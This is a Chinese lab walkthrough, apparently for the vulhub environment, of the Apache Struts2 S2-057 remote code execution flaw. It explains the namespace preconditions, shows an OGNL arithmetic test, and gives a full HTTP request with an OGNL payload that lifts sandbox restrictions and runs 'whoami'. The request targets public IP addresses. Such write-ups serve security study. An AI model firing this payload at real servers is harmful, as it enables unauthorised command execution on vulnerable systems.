S2-057远程执⾏代码漏洞
环境
vulhub靶场 /struts2/s2-057
漏洞简介
漏洞产⽣于⽹站配置XML时如果没有设置namespace的值,并且上层动作配置中并没有设置
或使⽤通配符namespace时,可能会导致远程代码执⾏漏洞的发⽣。同样也可能因为url标签没有设置value和action的值,并且上层动作并没有设置或使⽤通配符namespace,从⽽导致远程代码执⾏漏洞的发⽣。
S2-057 先决条件:
alwaysSelectFullNamespace 正确 - 操作元素未设置名称空间属性,或使⽤了通配符
⽤户将从 uri 传递命名空间,并将其解析为 OGNL 表达式,最终导致远程代码执⾏漏洞
访问靶机地址:http://121.40.229.129:8081/struts2-showcase/
在url处输⼊
http://39.105.61.160:8080/struts2-showcase/$%7B(123+123)%7D/actionChain1.action
刷新可以看到中间数字位置相加了 
使用Burp抓包当前页面
发送重放器,按下方修改代码
GET /struts2-showcase/$%7B%0A%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23a.getInputStream%28%29%29%29%7D/register2.action HTTP/1.1
Host: 39.105.61.160:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=46FFB76D910A0304B7BA6EB54FEF3585
Upgrade-Insecure-Requests: 1
Priority: u=0, i
